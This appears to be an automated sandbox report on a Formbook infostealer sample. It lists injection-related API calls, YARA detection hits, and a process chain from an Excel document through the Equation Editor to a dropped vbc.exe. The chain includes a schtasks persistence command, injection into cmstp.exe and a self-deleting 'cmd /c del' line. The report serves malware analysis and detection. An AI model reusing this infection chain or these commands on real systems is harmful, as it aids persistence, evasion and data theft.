Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FC30 NtOpenProcess,	12_2_01F3FC30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FFFC NtCreateProcessEx,	12_2_01F3FFFC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FF34 NtQueueApcThread,	12_2_01F3FF34
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FEA0 NtReadVirtualMemory,	12_2_01F3FEA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F3FE24 NtWriteVirtualMemory,	12_2_01F3FE24
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_001081C0 NtCreateFile,	12_2_001081C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_00108270 NtReadFile,	12_2_00108270
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_001082F0 NtClose,	12_2_001082F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_001083A0 NtAllocateVirtualMemory,	12_2_001083A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_001081BA NtCreateFile,	12_2_001081BA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010826A NtReadFile,	12_2_0010826A

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5879	4_2_002E5879
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED101	4_2_002ED101
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE178	4_2_002EE178
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E2140	4_2_002E2140
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EAA70	4_2_002EAA70
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E7BE0	4_2_002E7BE0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED410	4_2_002ED410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E6E28	4_2_002E6E28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E1729	4_2_002E1729
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0FB8	4_2_002E0FB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E2FC8	4_2_002E2FC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9928	4_2_002E9928
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E711B	4_2_002E711B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9919	4_2_002E9919
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE168	4_2_002EE168
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5180	4_2_002E5180
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5190	4_2_002E5190
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5B58	4_2_002E5B58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E53B0	4_2_002E53B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0470	4_2_002E0470
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E3D90	4_2_002E3D90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E4DF8	4_2_002E4DF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E6E19	4_2_002E6E19
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5663	4_2_002E5663
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5690	4_2_002E5690
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9F68	4_2_002E9F68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E3FA0	4_2_002E3FA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E3F90	4_2_002E3F90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D2040	4_2_005D2040
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D2464	4_2_005D2464
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D47AB	4_2_005D47AB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D0E78	4_2_005D0E78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D0E88	4_2_005D0E88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D8F28	4_2_005D8F28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D8F20	4_2_005D8F20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D6DB7	4_2_005D6DB7
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B8A3	10_2_0041B8A3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041C23F	10_2_0041C23F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041C2AF	10_2_0041C2AF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041C3DF	10_2_0041C3DF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041CC13	10_2_0041CC13
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B4A3	10_2_0041B4A3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041BD9B	10_2_0041BD9B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041BE60	10_2_0041BE60
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041C603	10_2_0041C603
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093E0C6	10_2_0093E0C6
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0096D005	10_2_0096D005
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0095905A	10_2_0095905A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00943040	10_2_00943040
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009BD06D	10_2_009BD06D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093E2E9	10_2_0093E2E9
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009E1238	10_2_009E1238
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009E63BF	10_2_009E63BF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009663DB	10_2_009663DB
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093F3CF	10_2_0093F3CF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00942305	10_2_00942305
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00947353	10_2_00947353
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0098A37B	10_2_0098A37B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00975485	10_2_00975485
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00951489	10_2_00951489
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C443E	10_2_009C443E
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0097D47D	10_2_0097D47D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0095C5F0	10_2_0095C5F0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C05E3	10_2_009C05E3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0094351F	10_2_0094351F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00986540	10_2_00986540
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00944680	10_2_00944680
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0094E6C1	10_2_0094E6C1
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0098A634	10_2_0098A634
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009E2622	10_2_009E2622
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C579A	10_2_009C579A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0094C7BC	10_2_0094C7BC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009757C3	10_2_009757C3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009BF8C4	10_2_009BF8C4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009DF8EE	10_2_009DF8EE
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0094C85C	10_2_0094C85C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0096286D	10_2_0096286D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009E098E	10_2_009E098E
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009429B2	10_2_009429B2
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009569FE	10_2_009569FE
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C5955	10_2_009C5955
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C394B	10_2_009C394B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009F3A83	10_2_009F3A83
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009ECBA4	10_2_009ECBA4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093FBD7	10_2_0093FBD7
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009CDBDA	10_2_009CDBDA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009C6BCB	10_2_009C6BCB
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00967B00	10_2_00967B00
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009DFDDD	10_2_009DFDDD
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00970D3B	10_2_00970D3B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0094CD5B	10_2_0094CD5B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00972E2F	10_2_00972E2F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0095EE4C	10_2_0095EE4C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009DCFB1	10_2_009DCFB1
Source: C:\Users\Public\vbc.exe	Code function: 10_2_009B2FDC	10_2_009B2FDC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00950F3F	10_2_00950F3F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0096DF7C	10_2_0096DF7C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002067C7	10_2_002067C7
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00205062	10_2_00205062
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002032FF	10_2_002032FF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00203302	10_2_00203302
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00201362	10_2_00201362
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002075B2	10_2_002075B2
Source: C:\Users\Public\vbc.exe	Code function: 10_2_002008F9	10_2_002008F9
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00200902	10_2_00200902
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4E0C6	12_2_01F4E0C6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F6905A	12_2_01F6905A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F53040	12_2_01F53040
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F7D005	12_2_01F7D005
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F763DB	12_2_01F763DB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4F3CF	12_2_01F4F3CF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FF63BF	12_2_01FF63BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F9A37B	12_2_01F9A37B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F57353	12_2_01F57353
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F52305	12_2_01F52305
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4E2E9	12_2_01F4E2E9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FF1238	12_2_01FF1238
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F6C5F0	12_2_01F6C5F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F96540	12_2_01F96540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F5351F	12_2_01F5351F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F85485	12_2_01F85485
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F61489	12_2_01F61489
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F8D47D	12_2_01F8D47D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FD443E	12_2_01FD443E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F857C3	12_2_01F857C3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F5C7BC	12_2_01F5C7BC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FD579A	12_2_01FD579A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F5E6C1	12_2_01F5E6C1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F54680	12_2_01F54680
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F9A634	12_2_01F9A634
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FF2622	12_2_01FF2622
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F669FE	12_2_01F669FE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F529B2	12_2_01F529B2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FF098E	12_2_01FF098E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_02003A83	12_2_02003A83
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FD5955	12_2_01FD5955
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FD394B	12_2_01FD394B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FEF8EE	12_2_01FEF8EE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F7286D	12_2_01F7286D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F5C85C	12_2_01F5C85C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4FBD7	12_2_01F4FBD7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FDDBDA	12_2_01FDDBDA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FFCBA4	12_2_01FFCBA4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F77B00	12_2_01F77B00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FEFDDD	12_2_01FEFDDD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F5CD5B	12_2_01F5CD5B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F80D3B	12_2_01F80D3B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FC2FDC	12_2_01FC2FDC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01FECFB1	12_2_01FECFB1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F7DF7C	12_2_01F7DF7C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F60F3F	12_2_01F60F3F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F6EE4C	12_2_01F6EE4C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F82E2F	12_2_01F82E2F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010C603	12_2_0010C603
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010CC13	12_2_0010CC13
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000F8C60	12_2_000F8C60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000F2D90	12_2_000F2D90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000F2FB0	12_2_000F2FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 0093DF5C appears 123 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0098373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009AF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00983F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 01F4DF5C appears 121 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 01FBF970 appears 84 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 01F93F92 appears 132 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 01F9373B appears 245 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 01F4E2A8 appears 38 times

Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_000156A6 push esp; retf	4_2_000156BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E949E pushad ; retf	4_2_002E949F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D5F5F pushad ; ret	4_2_005D5F6A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_04911097 push eax; retn 0027h	4_2_049110B9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_049112A1 push E9FFFFFFh; retf 0003h	4_2_049112A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_049108DC pushfd ; ret	4_2_049108DD
Source: C:\Users\Public\vbc.exe	Code function: 7_2_000156A6 push esp; retf	7_2_000156BA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041508E push ebp; iretd	10_2_0041508F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret	10_2_0041C9EA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0040C2CA push ds; retf	10_2_0040C2E5
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0040C31A push ds; retf	10_2_0040C31E
Source: C:\Users\Public\vbc.exe	Code function: 10_2_004153DF pushad ; ret	10_2_004153E0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B3B5 push eax; ret	10_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B46C push eax; ret	10_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B402 push eax; ret	10_2_0041B408
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041B40B push eax; ret	10_2_0041B472
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00414DDA pushfd ; retf	10_2_00414DDB
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0040EEAA push esp; retf	10_2_0040EEAF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0093DFA1 push ecx; ret	10_2_0093DFB4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_01F4DFA1 push ecx; ret	12_2_01F4DFB4
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010508E push ebp; iretd	12_2_0010508F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000FC2CA push ds; retf	12_2_000FC2E5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000FC31A push ds; retf	12_2_000FC31E
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010B3B5 push eax; ret	12_2_0010B408
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_001053DF pushad ; ret	12_2_001053E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010B402 push eax; ret	12_2_0010B408
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010B40B push eax; ret	12_2_0010B472
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010B46C push eax; ret	12_2_0010B472
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_0010C9C8 push dword ptr [ECF9F4C6h]; ret	12_2_0010C9EA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_00104DDA pushfd ; retf	12_2_00104DDB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 12_2_000FEEAA push esp; retf	12_2_000FEEAF

Source: initial sample	Static PE information: section name: .text entropy: 7.35233596991
Source: initial sample	Static PE information: section name: .text entropy: 7.35233596991
Source: initial sample	Static PE information: section name: .text entropy: 7.35233596991

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
